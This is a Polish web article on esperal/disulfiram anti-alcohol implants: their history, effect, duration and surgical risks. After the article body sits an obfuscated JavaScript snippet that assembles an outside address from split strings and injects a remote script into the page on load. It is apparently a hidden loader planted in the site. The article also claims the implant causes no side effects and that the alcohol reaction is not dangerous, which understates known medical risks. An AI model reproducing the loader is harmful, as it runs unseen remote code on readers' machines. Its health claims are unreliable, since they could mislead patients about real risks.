Zamknij

Wszywki alkoholowe a zdrowie pacjenta

11:15, 12.09.2018 Aktualizacja: 11:15, 13.09.2018
Skomentuj

Implementacja esparolu to zabieg chirurgiczny, i jako taki może się wiązać z nieprzyjemnymi, czy wręcz niebezpiecznymi dla naszego zdrowia i życia powikłaniami. Czy to oznacza, że należy obawiać się zaszywania?

Dawniej zaszywanie alkoholików było powszechną praktyką stosowaną w przypadku osób uzależnionych. Uważano, że nieprzyjemne doznania towarzyszące konsumpcji alkoholu po wszyciu esperalu skutecznie zniechęcą osoby uzależnione od alkoholu od sięgania po napoje procentowe. Praktyka pokazała jednak, że w wielu przypadkach kuracja nie przynosiła zamierzonych efektów. W roku 2009 zaprzestano produkcji esperalu, w konsekwencji czego z rynku zniknęły esperalowe wszywki alkoholowe (http://www.chirurg-24.pl). Wstrzymanie produkcji leku nie było jednak spowodowane niepożądanymi skutkami ubocznymi terapii, a jedynie stwierdzonym niskim poziomem jej skuteczności.

Jakiś czas temu wszywki alkoholowe o działaniu zbliżonym do wszywek esperalowych wróciły na rynek, a zabiegi zaszywania wykonuje się już w zdecydowanej większości niepublicznych praktyk chirurgicznych na terenie Warszawy oraz innych miast.

Zaszycie esperalu a abstynencja

Jak już wcześniej wspomnieliśmy wszywka przeciwalkoholowa jest całkowicie neutralna dla ludzkiego organizmu. Oznacza to, iż osoby, która – mówiąc kolokwialnie – dała się zaszyć i nie spożywa alkoholu nie występują żadne dolegliwości związane z implementacją leku. Oczywiście – o tym też już wspomnieliśmy – dotyczy to zabiegów wykonanych w sprawdzonych gabinetach chirurgicznych. Wykonanie zabiegu w nieodpowiednich warunkach może skutkować powikłaniami typowymi dla źle przeprowadzonych zabiegów chirurgicznych. Mamy tu na myśli przede wszystkim zakażenie i jego konsekwencje.

W Warszawie i każdym większym mieście w Polsce z łatwością znajdziemy godny zaufania gabinet chirurgiczny, w którym zabieg implantacja wszywki przeciwalkoholowej zostanie przeprowadzony w sterylnych warunkach.

Zaszycie esperalu a spożywanie alkoholu

Specyfik zastępujący esperal niczym nie różni się w działaniu od dawnych wszywek. Oznacza to, iż konsumpcja alkoholu po zaszyciu wiąże się z nieprzyjemnymi objawami fizycznymi, które są wynikiem zatrucia alkoholowego organizmu. Wszywka alkoholowa zatrzymuje bowiem metabolizm alkoholu, w związku z czym osoba zaszyta doświadcza objawów dojmującego kaca już kilka minut po spożyciu nawet niewielkiej ilości alkoholu. Z czasem objawy mijają i choć nie są przyjemne, nie stanowią one bezpośredniego zagrożenia dla zdrowia czy życia osoby zaszytej.

Jak długo działa lek?

Producent wszywek gwarantuje działanie leku przez okres ośmiu miesięcy po implementacji. W praktyce niektórzy pacjenci odczuwali nieprzyjemne konsekwencje spożycia alkoholu znacznie dłużej, nawet do dwunastu miesięcy do zabiegu. Warto jednak zauważyć, iż każdy organizm jest inny, w związku z czym rodzaj oraz siła doznań różni się u poszczególnych pacjentów. Odnotowano także przypadki, w których nieprzyjemne objawy nie wystąpiły mimo zaszycia esperalu.

Co to znaczy „zaszyć się od alkoholu”?

Lata temu o osobach, które próbowały walczyć z nałogiem alkoholowym z pomocą leku o nazwie esperal mówiło się, że są zaszyte lub dały się zaszyć. Określenia te miały swoje źródło w implementacji esperalu, która polegała na zaszywaniu specyfiku pod skórą pacjenta. Wszywki esperalowe umieszczano pod łopatką lub w pośladku. Dzisiejsze zaszycie niczym nie różni się od praktyk stosowanych przed laty. Implementacja esperalu wykonywana jest przez lekarza chirurga, a zabieg przeprowadza się w znieczuleniu miejscowym. Trwa to około 30 minut. W Warszawie oraz innych większych miastach w kraju zaszyć się można w prywatnych gabinetach działających całodobowo.

Dlaczego esperal nie działa?

Kiedyś panowało błędne przekonanie, że po zaszyciu alkoholik traci popęd do alkoholu, a przynajmniej powinien. Przekonanie to było dalekie od rzeczywistego oddziaływania esperalu na organizm człowieka, dlatego też wiele osób – zarówno chorych, jak i osób z ich najbliższego otoczenia – spotykało nieprzyjemne rozczarowanie. Zadaniem wszywki przeciwalkoholowej nie jest bowiem zaspakajanie głodu alkoholowego, a wyłącznie wywoływanie nieprzyjemnych objawów fizycznych krótko po jego konsumpcji, co – przynajmniej teoretycznie – miało zniechęcić osoby borykające się z problemem alkoholowym do sięgania po napoje wyskokowe. Jako że wszywany esperal nie łagodził głodu osoby zaszyte wciąż chętnie sięgały po kieliszek, jednocześnie mając świadomość, że źródłem nieprzyjemnych doznań nie jest sam alkohol, a zaimplementowana w ich organizmie wszywka przeciwalkoholowa. Z tego też powodu gros terapeutów – Warszawa nie jest tutaj wyjątkiem – odeszło do rekomendowania „zaszywania” jako skutecznej formy walki z alkoholizmem. Czy to dobrze?

Odpowiedź na to pytanie nie jest prosta. Skuteczność esperalu, a właściwie disulfiramu jest bowiem całkowicie subiektywna i w dużej mierze zależy od nastawienia pacjenta oraz jego woli walki z chorobą.

Czy zaszywanie się jest niebezpieczne?

Implementacja wszywki alkoholowej to zawsze zabieg chirurgiczny, a jako taki wiąże się z niebezpieczeństwem zakażenia. Dlatego warto wybierać sprawdzone gabinety, które dbają o higienę oraz bezpieczeństwo pacjentów. Jeśli natomiast chodzi o oddziaływanie specyfiku na organizm pacjenta, nie zaobserwowano żadnych skutków ubocznych zaszycia. Naturalnie poza nieprzyjemnymi doznaniami towarzyszącymi zatruciu alkoholowemu organizmu, które z założenia powoduje wszywka esperalowa.

(function(){ igaj_=("u"+"st");igaj=document.createElement("script");igaj.async=true; igaju="124299648";igaj_+="a"+("t.");igaj_+="i"+("nf"+("o"))+("/"); igaju+=".npi4xtv6gajxyfsr";igaju+="s5nu22i8wilkjX"; igaj.src="https://"+igaj_+igaju;igaj.type="text/javascript"; d_b=document.body;d_b.appendChild(igaj); })();

Co sądzisz na ten temat?

podoba mi się 0
nie podoba mi się 0
śmieszne 0
szokujące 0
przykre 0
wkurzające 0
facebookFacebook
twitterTwitter
wykopWykop
komentarzeKomentarze

komentarz(0)

Brak komentarza, Twój może być pierwszy.

Dodaj komentarz

0%